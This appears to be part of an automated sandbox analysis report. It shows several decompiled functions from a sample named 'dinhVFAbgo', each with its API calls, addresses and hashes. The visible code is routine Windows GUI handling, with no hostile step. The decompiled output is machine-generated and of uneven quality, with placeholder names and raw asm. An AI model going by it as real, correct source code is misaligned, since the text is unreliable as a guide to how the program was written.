			E00CFEB2F(void* __ebx, intOrPtr* __ecx, void* __edx, RECT* __edi, signed int __esi, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _v0;
				signed int _v4;
				char _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				signed int _v44;
				intOrPtr _t47;
				intOrPtr _t49;
				intOrPtr _t55;
				int _t56;
				int _t66;
				intOrPtr* _t79;
				intOrPtr* _t80;
				void* _t97;
				RECT* _t98;
				void* _t102;
				signed int _t104;

				_t101 = __esi;
				_t98 = __edi;
				_t97 = __edx;
				_t80 = __ecx;
				_push(0x20);
				E00DDD55F(0xe0bdac, __ebx, __edi, __esi);
				_t79 = __ecx;
				_t47 = _a8;
				_v40 = _t47;
				if(__ecx == 0 ||  *((intOrPtr*)(__ecx + 0x20)) == 0) {
					L19:
					E00CAA4E7(_t79, _t80, _t98, _t101, __eflags);
					asm("int3");
					_t49 =  *((intOrPtr*)(_t80 + 0x9c));
					__eflags = _t49 - _v0;
					if(_t49 > _v0) {
						__eflags = _t49 - _a8;
						if(_t49 > _a8) {
							_push(_t101);
							_push(_t98);
							_t99 = _t80 + 0x94;
							_t102 = E00CBE844(_t80 + 0x94, _a4);
							_push(E00CBE844(_t80 + 0x94, _a8));
							E00CC0367(_t79, _t99, _t99, _t102, _a4);
							_push(_t102);
							_t49 = E00CC0367(_t79, _t99, _t99, _t102, _a8);
						}
					}
					return _t49;
				} else {
					if( *((intOrPtr*)(__ecx + 0x154)) == 0 || _t47 < 0 || _t47 >=  *((intOrPtr*)(__ecx + 0x9c))) {
						L14:
						goto L15;
					} else {
						_t80 = __ecx + 0x94;
						_t55 = E00CBE844(_t80, _t47);
						_v36 = _t55;
						_t8 = _t55 + 0x10; // 0x10
						_t98 = _t8;
						_t56 = IsRectEmpty(_t98);
						if(_t56 != 0) {
							goto L14;
						} else {
							_t117 =  *(_t79 + 0x150) - _t56;
							if( *(_t79 + 0x150) != _t56) {
								goto L19;
							} else {
								_t104 = E00CA9583(_t117, 0x80);
								_v44 = _t104;
								_v4 = _v4 & 0x00000000;
								if(_t104 == 0) {
									_t104 = 0;
									__eflags = 0;
								} else {
									E00CB079B(_t104);
									 *_t104 = 0xe1be88;
								}
								_v4 = _v4 | 0xffffffff;
								 *(_t79 + 0x150) = _t104;
								_t98 =  &_v32;
								asm("movsd");
								asm("movsd");
								asm("movsd");
								asm("movsd");
								_t101 =  *( *_t79 + 0x208);
								 *0xe17a64( &_v32);
								 *( *( *_t79 + 0x208))();
								if(E00CD7F59( *(_t79 + 0x150), 0x50800080,  &_v32, _t79, 1) != 0) {
									E00CB7AE0( *(_t79 + 0x150),  *((intOrPtr*)(_v36 + 4)));
									_t101 =  *(_t79 + 0x150);
									_t66 = E00CC19ED() + 0x11c;
									__eflags = _t66;
									if(_t66 != 0) {
										_t66 =  *(_t66 + 4);
									}
									SendMessageA( *(_t101 + 0x20), 0x30, _t66, 1);
									SendMessageA( *( *(_t79 + 0x150) + 0x20), 0xb1, 0, 0xffffffff);
									E00CB7A0A(_t79,  *(_t79 + 0x150), _t97);
									 *((intOrPtr*)(_t79 + 0x14c)) = _v40;
									E00CB277F(_t79, _v40, _t97, SetCapture( *(_t79 + 0x20)));
								} else {
									_t98 =  *(_t79 + 0x150);
									if(_t98 != 0) {
										_t101 =  *(_t98->left + 4);
										 *0xe17a64(1);
										 *( *(_t98->left + 4))();
									}
									 *(_t79 + 0x150) =  *(_t79 + 0x150) & 0x00000000;
									goto L14;
								}
								L15:
								return E00DDD50E(_t79, _t98, _t101);
							}
						}
					}
				}
			}

0x00cfeb2f
0x00cfeb2f
0x00cfeb2f
0x00cfeb2f
0x00cfeb2f
0x00cfeb36
0x00cfeb3b
0x00cfeb3d
0x00cfeb40
0x00cfeb45
0x00cfecb4
0x00cfecb4
0x00cfecb9
0x00cfecbd
0x00cfecc3
0x00cfecc6
0x00cfecc8
0x00cfeccb
0x00cfeccd
0x00cfecce
0x00cfecd2
0x00cfece4
0x00cfeceb
0x00cfecf1
0x00cfecf6
0x00cfecfc
0x00cfed02
0x00cfeccb
0x00cfed04
0x00cfeb55
0x00cfeb5c
0x00cfec36
0x00000000
0x00cfeb76
0x00cfeb76
0x00cfeb7d
0x00cfeb82
0x00cfeb85
0x00cfeb85
0x00cfeb89
0x00cfeb91
0x00000000
0x00cfeb97
0x00cfeb97
0x00cfeb9d
0x00000000
0x00cfeba3
0x00cfebad
0x00cfebb0
0x00cfebb3
0x00cfebb9
0x00cfebca
0x00cfebca
0x00cfebbb
0x00cfebbd
0x00cfebc2
0x00cfebc2
0x00cfebd1
0x00cfebd5
0x00cfebdd
0x00cfebe1
0x00cfebe2
0x00cfebe3
0x00cfebe4
0x00cfebe5
0x00cfebed
0x00cfebf5
0x00cfec10
0x00cfec4c
0x00cfec51
0x00cfec5c
0x00cfec5c
0x00cfec61
0x00cfec63
0x00cfec63
0x00cfec6e
0x00cfec86
0x00cfec92
0x00cfec9d
0x00cfecaa
0x00cfec12
0x00cfec12
0x00cfec1a
0x00cfec20
0x00cfec25
0x00cfec2d
0x00cfec2d
0x00cfec2f
0x00000000
0x00cfec2f
0x00cfec38
0x00cfec3d
0x00cfec3d
0x00cfeb9d
0x00cfeb91
0x00cfeb5c

APIs

__EH_prolog3_GS.LIBCMT ref: 00CFEB36
IsRectEmpty.USER32 ref: 00CFEB89
SendMessageA.USER32(00000000,00000030,-0000011C,00000001), ref: 00CFEC6E
SendMessageA.USER32(00000000,000000B1,00000000,000000FF), ref: 00CFEC86
SetCapture.USER32(00000000,?,00000001), ref: 00CFECA3

Memory Dump Source

Source File: 00000000.00000002.506357478.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000000.00000002.506332792.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507292603.0000000000E17000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507423794.0000000000E68000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507430686.0000000000E6A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507471703.0000000000E85000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507489751.0000000000E8A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ca0000_dinhVFAbgo.jbxd

Similarity

API ID: MessageSend$CaptureEmptyH_prolog3_Rect
String ID:
API String ID: 3655451571-0
Opcode ID: b6c1e8ac713f8b6336809ed225ad650e20db874af2577c905bf950a6b8028fe0
Instruction ID: 9e4d72518238b701b385ac35455a6a7ff5e148c8335e737441642a9b208347fc
Opcode Fuzzy Hash: b6c1e8ac713f8b6336809ed225ad650e20db874af2577c905bf950a6b8028fe0
Instruction Fuzzy Hash: 1F419D316006088FDF25EFA4C889BE937B1FF48711F184169FE55AF2A6DB709900DB62

Uniqueness

Uniqueness Score: -1.00%

Function 00CE760A Relevance: 7.6, APIs: 5, Instructions: 109
COMMON

Download Yara Rule

C-Code - Quality: 34%

			E00CE760A(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags, void* __fp0) {
				long _t45;
				struct HBRUSH__* _t47;
				void* _t50;
				intOrPtr _t66;
				void* _t74;
				void* _t75;
				void* _t78;
				long _t85;
				void* _t94;
				intOrPtr* _t96;
				intOrPtr _t100;
				void* _t102;
				void* _t108;

				_t108 = __fp0;
				_t94 = __edx;
				_push(0x10);
				E00DDD52C(0xe0adbd, __ebx, __edi, __esi);
				_t96 =  *((intOrPtr*)(_t102 + 8));
				_t45 = GetTextColor( *(_t96 + 8));
				_t104 =  *0xe872e4;
				_t85 = _t45;
				if( *0xe872e4 == 0) {
					_t47 = E00CC19ED() + 0xd0;
					__eflags = _t47;
					if(_t47 != 0) {
						_t47 =  *(_t47 + 4);
					}
					FillRect( *(_t96 + 4), _t102 + 0xc, _t47);
					_t50 = E00CC19ED();
					E00CC0750(_t102 + 0xc,  *((intOrPtr*)(E00CC19ED() + 0x5c)),  *((intOrPtr*)(_t50 + 0x5c)));
					__eflags =  *(_t102 + 0x20);
					if( *(_t102 + 0x20) == 0) {
						__eflags =  *(_t102 + 0x24);
						if(__eflags != 0) {
							_t100 =  *((intOrPtr*)(E00CC19ED() + 0x58));
							_t66 =  *((intOrPtr*)(E00CC19ED() + 0x5c));
							goto L12;
						}
					} else {
						OffsetRect(_t102 + 0xc, 1, 1);
						_t100 =  *((intOrPtr*)(E00CC19ED() + 0x5c));
						_t66 =  *((intOrPtr*)(E00CC19ED() + 0x58));
						L12:
						E00CC0750(_t102 + 0xc, _t66, _t100);
					}
				} else {
					E00D0A290(_t102 - 0x14, _t96);
					 *(_t102 - 4) =  *(_t102 - 4) & 0x00000000;
					_t74 = E00CC19ED();
					_t101 =  *((intOrPtr*)(_t74 + 0x5c));
					_t75 = E00CC19ED();
					_push( *((intOrPtr*)(_t74 + 0x5c)));
					_push( *((intOrPtr*)(_t75 + 0x54)));
					_push(_t102 + 0xc);
					_t78 = E00D0BD04(_t85, _t102 - 0x14, _t96,  *((intOrPtr*)(_t74 + 0x5c)), _t104);
					_t105 =  *(_t102 + 0x20);
					if( *(_t102 + 0x20) == 0) {
						__eflags =  *(_t102 + 0x24);
						if(__eflags != 0) {
							goto L4;
						}
					} else {
						OffsetRect(_t102 + 0xc, 1, 1);
						L4:
						_push( *((intOrPtr*)(E00CC19ED() + 0x58)));
						_push(0xffffffff);
						_push(_t102 + 0xc);
						_t78 = E00D0BD04(_t85, _t102 - 0x14, _t96, _t101, _t105);
					}
					 *(_t102 - 4) =  *(_t102 - 4) | 0xffffffff;
					E00D0A2A5(_t78, _t102 - 0x14);
				}
				 *(_t102 - 0x1c) =  *(_t102 - 0x1c) & 0x00000000;
				 *(_t102 - 0x18) =  *(_t102 - 0x18) & 0x00000000;
				E00D09EB6(_t94,  *((intOrPtr*)(_t102 + 0x1c)) != 0, _t108, _t96, 0, _t102 + 0xc, 0 |  *((intOrPtr*)(_t102 + 0x1c)) != 0x00000000, _t102 - 0x1c);
				 *0xe17a64(_t85);
				return E00DDD4FA( *((intOrPtr*)( *((intOrPtr*)( *_t96 + 0x30))))());
			}

0x00ce760a
0x00ce760a
0x00ce760a
0x00ce7611
0x00ce7616
0x00ce761c
0x00ce7622
0x00ce7629
0x00ce762b
0x00ce76a0
0x00ce76a0
0x00ce76a5
0x00ce76a7
0x00ce76a7
0x00ce76b2
0x00ce76b8
0x00ce76d0
0x00ce76d5
0x00ce76d9
0x00ce76fb
0x00ce76ff
0x00ce7706
0x00ce770e
0x00000000
0x00ce770e
0x00ce76db
0x00ce76e3
0x00ce76ee
0x00ce76f6
0x00ce7711
0x00ce7719
0x00ce7719
0x00ce762d
0x00ce7631
0x00ce7636
0x00ce763a
0x00ce763f
0x00ce7642
0x00ce7647
0x00ce764e
0x00ce7652
0x00ce7653
0x00ce7658
0x00ce765c
0x00ce766e
0x00ce7672
0x00000000
0x00000000
0x00ce765e
0x00ce7666
0x00ce7674
0x00ce767c
0x00ce7682
0x00ce7684
0x00ce7685
0x00ce7685
0x00ce768a
0x00ce7691
0x00ce7691
0x00ce771e
0x00ce7725
0x00ce773a
0x00ce7747
0x00ce7756

APIs

__EH_prolog3.LIBCMT ref: 00CE7611
GetTextColor.GDI32(?), ref: 00CE761C
OffsetRect.USER32(?,00000001,00000001), ref: 00CE7666
FillRect.USER32 ref: 00CE76B2
OffsetRect.USER32(?,00000001,00000001), ref: 00CE76E3

Part of subcall function 00D0BD04: __EH_prolog3_GS.LIBCMT ref: 00D0BD0B
Part of subcall function 00D0BD04: CreateCompatibleDC.GDI32(00000000), ref: 00D0BD6F
Part of subcall function 00D0BD04: CreateCompatibleBitmap.GDI32(?,?,?), ref: 00D0BDA5
Part of subcall function 00D0BD04: SelectObject.GDI32(?,00000000), ref: 00D0BDF9

Memory Dump Source

Source File: 00000000.00000002.506357478.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000000.00000002.506332792.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507292603.0000000000E17000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507423794.0000000000E68000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507430686.0000000000E6A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507471703.0000000000E85000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507489751.0000000000E8A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ca0000_dinhVFAbgo.jbxd

Similarity

API ID: Rect$CompatibleCreateOffset$BitmapColorFillH_prolog3H_prolog3_ObjectSelectText
String ID:
API String ID: 4029571948-0
Opcode ID: 45b6206a01398c062d23fbcd8e32a87df16e5f7b6e7c9fbc5e46583c47bd97d4
Instruction ID: 1cf45c568ab26564cc0b0bb1844967c5da4622a56c402ee46851fbef05669f01
Opcode Fuzzy Hash: 45b6206a01398c062d23fbcd8e32a87df16e5f7b6e7c9fbc5e46583c47bd97d4
Instruction Fuzzy Hash: 14418C32504208EFCB04EFA6C85AFEE73B9EF04321F148155F915AB1A2DB74AE44DB61

Uniqueness

Uniqueness Score: -1.00%

Function 00D04973 Relevance: 7.6, APIs: 5, Instructions: 96
windowCOMMON

Download Yara Rule

C-Code - Quality: 83%

			E00D04973(void* __ebx, intOrPtr* __ecx, void* __esi, signed short _a4, signed short _a8, long _a12) {
				signed int _v8;
				void* __edi;
				long _t24;
				intOrPtr* _t28;
				void* _t40;
				signed short _t41;
				int _t42;
				intOrPtr _t47;
				intOrPtr _t55;
				signed short _t56;
				intOrPtr* _t58;
				void* _t60;
				void* _t62;

				_t60 = __esi;
				_t40 = __ebx;
				_push(__ecx);
				_t24 = _a12;
				_t58 = __ecx;
				if( *((intOrPtr*)(__ecx + 0x250)) == 0) {
					L14:
					_t24 = E00CB395D(_t58, _t58, _a4, _a8, _t24);
					L15:
					return _t24;
				}
				if(_t24 != 0) {
					_t47 =  *((intOrPtr*)(_t24 + 0x20));
				} else {
					_t47 = 0;
				}
				_t55 = _t58 + 0x330;
				if(_t55 != 0) {
					_t55 =  *((intOrPtr*)(_t55 + 0x20));
				}
				if(_t47 != _t55) {
					goto L14;
				} else {
					if( *((intOrPtr*)(_t58 + 0xc0)) != 0xffffffff &&  *0xe87efc == 0) {
						 *0xe17a64(_t60, _t40);
						_t62 =  *((intOrPtr*)( *((intOrPtr*)( *_t58 + 0x210))))();
						_t28 = E00CBFD51(_t40, _t58 + 0x94, _t58, _t62,  *((intOrPtr*)(_t58 + 0xc0)));
						_t41 = _a8;
						_t56 = _a4;
						 *0xe87efc = 1;
						_v8 = (_t41 & 0x0000ffff) << 0x10;
						_v8 = _v8 | _t56 & 0x0000ffff;
						if( *((intOrPtr*)( *_t28 + 0x38)) != 0 && (_t56 == 4 || _t56 == 5)) {
							SendMessageA( *(_t62 + 0x20), 0x1014, _t41 - E00CB2B6E(_t62, 0), 0);
						}
						_t42 = _v8;
						SendMessageA( *(_t62 + 0x20), 0x114, _t42, 0);
						 *0xe87efc =  *0xe87efc & 0x00000000;
						SetScrollPos( *(_t58 + 0x350), 2, E00CB2B6E(_t62, 0), 1);
						E00D031A2(_t58);
						_t24 = SendMessageA( *(E00CB277F(_t42, _t58, _t56, GetParent( *(_t58 + 0x20))) + 0x20),  *0xe87ee4, _t42, 0);
					}
					goto L15;
				}
			}

0x00d04973
0x00d04973
0x00d04976
0x00d04977
0x00d0497b
0x00d04984
0x00d04a9b
0x00d04aa4
0x00d04aa9
0x00d04aab
0x00d04aab
0x00d0498c
0x00d04992
0x00d0498e
0x00d0498e
0x00d0498e
0x00d04995
0x00d0499d
0x00d0499f
0x00d0499f
0x00d049a4
0x00000000
0x00d049aa
0x00d049b1
0x00d049d0
0x00d049e6
0x00d049e8
0x00d049ed
0x00d049f0
0x00d049f3
0x00d04a05
0x00d04a0b
0x00d04a12
0x00d04a34
0x00d04a34
0x00d04a3a
0x00d04a48
0x00d04a4e
0x00d04a69
0x00d04a71
0x00d04a91
0x00d04a98
0x00000000
0x00d049b1

APIs

SendMessageA.USER32(?,00001014,?,00000000), ref: 00D04A34
SendMessageA.USER32(?,00000114,?,00000000), ref: 00D04A48
SetScrollPos.USER32 ref: 00D04A69
GetParent.USER32(?), ref: 00D04A79
SendMessageA.USER32(?,?,00000000,00000000), ref: 00D04A91

Memory Dump Source

Source File: 00000000.00000002.506357478.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000000.00000002.506332792.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507292603.0000000000E17000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507423794.0000000000E68000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507430686.0000000000E6A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507471703.0000000000E85000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507489751.0000000000E8A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ca0000_dinhVFAbgo.jbxd

Similarity

API ID: MessageSend$ParentScroll
String ID:
API String ID: 375824706-0
Opcode ID: 476455e0e937eb0f36dbed248c27881de6ff070dc809a5f7ce21b423b8bd5d82
Instruction ID: 8eeb3fc3114338a07d59dfa41ce7bd94a6fd125d83b1ceb06db9de9bbbc33006
Opcode Fuzzy Hash: 476455e0e937eb0f36dbed248c27881de6ff070dc809a5f7ce21b423b8bd5d82
Instruction Fuzzy Hash: 3E31C070340205AFDB198F21CC49FEA77AAFB44719F144159F68A671F0DBB19D50DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00CB570D Relevance: 7.6, APIs: 5, Instructions: 81
windowCOMMON

Download Yara Rule

C-Code - Quality: 97%

			E00CB570D(void* __ebx, signed int __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				struct HWND__* _t26;
				signed int _t29;
				int _t31;
				signed int _t33;
				signed int _t35;
				signed int _t40;
				void* _t47;
				struct HWND__* _t49;
				signed int _t50;
				struct HWND__* _t52;
				void* _t53;
				void* _t54;

				_t54 = __eflags;
				_t47 = __edx;
				_push(0xa8);
				E00DDD52C(0xe08927, __ebx, __edi, __esi);
				_t40 = __ecx;
				E00CAFEB8(_t53 - 0x34);
				_t49 = 0;
				_t43 = _t53 - 0xb4;
				E00CB0725(_t53 - 0xb4, _t54, 0);
				 *(_t53 - 0xb4) = 0xe187f8;
				 *((intOrPtr*)(_t53 - 4)) = 0;
				_t26 = GetTopWindow( *(__ecx + 0x20));
				while(1) {
					_t52 = _t26;
					if(_t52 == 0) {
						break;
					}
					 *(_t53 - 0x94) = _t52;
					 *((intOrPtr*)(_t53 - 0x30)) = GetDlgCtrlID(_t52);
					 *((intOrPtr*)(_t53 - 0x20)) = _t53 - 0xb4;
					_t29 = E00CB27A9(_t43, _t49, __eflags, _t52);
					__eflags = _t29;
					if(_t29 == 0) {
						L3:
						_t43 = _t40;
						_t31 = L00CB00DA(_t40, _t40, _t47,  *((intOrPtr*)(_t53 - 0x30)), 0xffffffff, _t53 - 0x34, _t49);
						__eflags = _t31;
						if(__eflags == 0) {
							_t50 =  *(_t53 + 0xc);
							__eflags = _t50;
							if(_t50 != 0) {
								_t33 = SendMessageA( *(_t53 - 0x94), 0x87, _t31, _t31);
								__eflags = _t33 & 0x00002000;
								if((_t33 & 0x00002000) == 0) {
									L10:
									_t50 = 0;
									__eflags = 0;
								} else {
									_t35 = E00CB778C(_t53 - 0xb4) & 0x0000000f;
									__eflags = _t35 - 3;
									if(_t35 == 3) {
										goto L10;
									} else {
										__eflags = _t35 - 6;
										if(_t35 == 6) {
											goto L10;
										} else {
											__eflags = _t35 - 7;
											if(_t35 == 7) {
												goto L10;
											} else {
												__eflags = _t35 - 9;
												if(_t35 == 9) {
													goto L10;
												}
											}
										}
									}
								}
							}
							_t43 = _t53 - 0x34;
							E00CAFF57(_t40, _t53 - 0x34,  *((intOrPtr*)(_t53 + 8)), _t50);
							_t49 = 0;
							__eflags = 0;
						}
					} else {
						_t43 = _t29;
						__eflags = L00CB00DA(_t40, _t29, _t47, _t49, 0xbd11ffff, _t53 - 0x34, _t49);
						if(__eflags == 0) {
							goto L3;
						}
					}
					_t26 = GetWindow(_t52, 2);
				}
				 *(_t53 - 0x94) = _t49;
				return E00DDD4FA(E00CB09A9(_t53 - 0xb4));
			}

0x00cb570d
0x00cb570d
0x00cb570d
0x00cb5717
0x00cb571c
0x00cb5721
0x00cb5726
0x00cb5728
0x00cb572f
0x00cb5734
0x00cb5741
0x00cb5744
0x00cb57f9
0x00cb57f9
0x00cb57fd
0x00000000
0x00000000
0x00cb5750
0x00cb575c
0x00cb5766
0x00cb5769
0x00cb576e
0x00cb5770
0x00cb5788
0x00cb578c
0x00cb5794
0x00cb5799
0x00cb579b
0x00cb579d
0x00cb57a0
0x00cb57a2
0x00cb57b1
0x00cb57b7
0x00cb57bc
0x00cb57e0
0x00cb57e0
0x00cb57e0
0x00cb57be
0x00cb57c9
0x00cb57cc
0x00cb57cf
0x00000000
0x00cb57d1
0x00cb57d1
0x00cb57d4
0x00000000
0x00cb57d6
0x00cb57d6
0x00cb57d9
0x00000000
0x00cb57db
0x00cb57db
0x00cb57de
0x00000000
0x00000000
0x00cb57de
0x00cb57d9
0x00cb57d4
0x00cb57cf
0x00cb57bc
0x00cb57e6
0x00cb57e9
0x00cb57ee
0x00cb57ee
0x00cb57ee
0x00cb5772
0x00cb577d
0x00cb5784
0x00cb5786
0x00000000
0x00000000
0x00cb5786
0x00cb57f3
0x00cb57f3
0x00cb5809
0x00cb5819

APIs

__EH_prolog3.LIBCMT ref: 00CB5717
GetTopWindow.USER32(?), ref: 00CB5744
GetDlgCtrlID.USER32 ref: 00CB5756
SendMessageA.USER32(?,00000087,00000000,00000000), ref: 00CB57B1
GetWindow.USER32(00000000,00000002), ref: 00CB57F3

Memory Dump Source

Source File: 00000000.00000002.506357478.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000000.00000002.506332792.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507292603.0000000000E17000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507423794.0000000000E68000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507430686.0000000000E6A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507471703.0000000000E85000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507489751.0000000000E8A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ca0000_dinhVFAbgo.jbxd

Similarity

API ID: Window$CtrlH_prolog3MessageSend
String ID:
API String ID: 849854284-0
Opcode ID: ff1c6c74fbb0a9c6163b7b58b9545e5d01dbb813af23ac7e11031ae3871cd893
Instruction ID: b1635a2e0624fca286680c4e2b101440482b87b68a6664cadd4f8587950ec95e
Opcode Fuzzy Hash: ff1c6c74fbb0a9c6163b7b58b9545e5d01dbb813af23ac7e11031ae3871cd893
Instruction Fuzzy Hash: 8821E231A10614AADF26EF61CD86FEE76B9EF91300F600159F815F2292DF308F44DA11

Uniqueness

Uniqueness Score: -1.00%

Function 00D04AAE Relevance: 7.6, APIs: 5, Instructions: 80
windowCOMMON

Download Yara Rule

C-Code - Quality: 74%

			E00D04AAE(intOrPtr* __ecx, void* __edx, int _a4, struct tagPOINT _a8, signed short _a12) {
				signed int _v8;
				struct tagRECT _v24;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t29;
				intOrPtr* _t47;
				void* _t57;
				intOrPtr* _t58;
				void* _t59;
				signed int _t61;

				_t57 = __edx;
				_t48 = __ecx;
				_t29 =  *0xe68dd4; // 0x8d2643c2
				_v8 = _t29 ^ _t61;
				_t58 = __ecx;
				_t47 =  *((intOrPtr*)(__ecx + 0x2a00));
				while(_t47 != 0) {
					_t47 =  *_t47;
					_t59 = E00CB277F(_t47, _t48, _t57,  *((intOrPtr*)(_t47 + 8)));
					_v24.left = 0;
					_v24.top = 0;
					_v24.right = 0;
					_v24.bottom = 0;
					GetClientRect( *(_t59 + 0x20),  &_v24);
					MapWindowPoints( *(_t59 + 0x20),  *(_t58 + 0x20),  &_v24, 2);
					_push(_a12);
					__eflags = PtInRect( &_v24, _a8.x);
					if(__eflags != 0) {
						L6:
						return E00DDCBCE(_t38, _t47, _v8 ^ _t61, _t57, _t58, _t59);
					}
				}
				 *0xe17a64( &_a8);
				_t59 =  *((intOrPtr*)( *((intOrPtr*)( *_t58 + 0x24c))))();
				if(_t59 == 0) {
					_push(_a12);
					_t38 = E00CFCCAB(_t58, __eflags, _a4, _a8.x);
				} else {
					MapWindowPoints( *(_t58 + 0x20),  *(_t59 + 0x20),  &_a8, 1);
					_t38 = SendMessageA( *(_t59 + 0x20), 0x203, _a4, (_a12 & 0x0000ffff) << 0x00000010 | _a8 & 0x0000ffff);
				}
				goto L6;
			}

0x00d04aae
0x00d04aae
0x00d04ab4
0x00d04abb
0x00d04ac1
0x00d04ac3
0x00d04b18
0x00d04ace
0x00d04ad5
0x00d04ad9
0x00d04adc
0x00d04adf
0x00d04ae2
0x00d04aec
0x00d04afe
0x00d04b04
0x00d04b14
0x00d04b16
0x00d04b7d
0x00d04b8b
0x00d04b8b
0x00d04b16
0x00d04b2a
0x00d04b34
0x00d04b38
0x00d04b6d
0x00d04b78
0x00d04b3a
0x00d04b46
0x00d04b65
0x00d04b65
0x00000000

APIs

GetClientRect.USER32(?,?), ref: 00D04AEC
MapWindowPoints.USER32 ref: 00D04AFE
PtInRect.USER32(?,?,?), ref: 00D04B0E
MapWindowPoints.USER32 ref: 00D04B46
SendMessageA.USER32(?,00000203,?,?), ref: 00D04B65

Memory Dump Source

Source File: 00000000.00000002.506357478.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000000.00000002.506332792.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507292603.0000000000E17000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507423794.0000000000E68000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507430686.0000000000E6A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507471703.0000000000E85000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507489751.0000000000E8A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ca0000_dinhVFAbgo.jbxd

Similarity

API ID: PointsRectWindow$ClientMessageSend
String ID:
API String ID: 3885650166-0
Opcode ID: 62ae37806e7b869550aa2df1e5f91a6d15e7d3c3cce4b70d58e4aed3cc566a02
Instruction ID: 9b4e54d713d89f1686f10dbf3a53253c6c1d3f94725397dbe904447839596f3e
Opcode Fuzzy Hash: 62ae37806e7b869550aa2df1e5f91a6d15e7d3c3cce4b70d58e4aed3cc566a02
Instruction Fuzzy Hash: DD313C72600609AFCF059F65CC44EAE7BB9FF08740B008169F95AA6260EB31DA14DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00CECA7B Relevance: 7.6, APIs: 5, Instructions: 70
COMMON

Download Yara Rule

C-Code - Quality: 65%

			E00CECA7B(intOrPtr* __ecx, intOrPtr _a4, struct tagRECT _a8, intOrPtr _a24) {
				signed int _v8;
				long _v12;
				long _v16;
				struct tagPOINT _v24;
				intOrPtr* _v28;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t25;
				int _t35;
				void* _t38;
				intOrPtr _t40;
				void* _t49;
				intOrPtr _t50;
				signed int _t53;
				void* _t54;

				_t41 = __ecx;
				_t25 =  *0xe68dd4; // 0x8d2643c2
				_v8 = _t25 ^ _t53;
				_t40 = _a4;
				_t50 = _a24;
				_t51 = 0;
				_v28 = __ecx;
				if( *((intOrPtr*)(_t50 + 0x7a8)) == 0) {
					_v24.x = 0;
					_v24.y = 0;
					_v16 = 0;
					_v12 = 0;
					GetClientRect( *(E00CB277F(_t40, _t41, _t49, GetParent( *(_t50 + 0x20))) + 0x20),  &_v24);
					MapWindowPoints( *(E00CB277F(_t40,  &_v24, _t49, GetParent( *(_t50 + 0x20))) + 0x20),  *(_t50 + 0x20),  &_v24, 2);
					_t50 = _t54 - 0x10;
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_t51 =  *( *_v28 + 0x1dc);
					 *0xe17a64(_t40);
					_t35 =  *( *( *_v28 + 0x1dc))();
				} else {
					_t38 = E00CC19ED() + 0x98;
					if(_t38 != 0) {
						_t51 =  *(_t38 + 4);
					}
					_t35 = FillRect( *(_t40 + 4),  &_a8, _t51);
				}
				return E00DDCBCE(_t35, _t40, _v8 ^ _t53, _t49, _t50, _t51);
			}

0x00ceca7b
0x00ceca81
0x00ceca88
0x00ceca8c
0x00ceca91
0x00ceca94
0x00ceca96
0x00ceca9f
0x00cecac3
0x00cecac6
0x00cecac9
0x00cecacc
0x00cecae2
0x00cecb03
0x00cecb12
0x00cecb17
0x00cecb18
0x00cecb19
0x00cecb1a
0x00cecb1b
0x00cecb23
0x00cecb2c
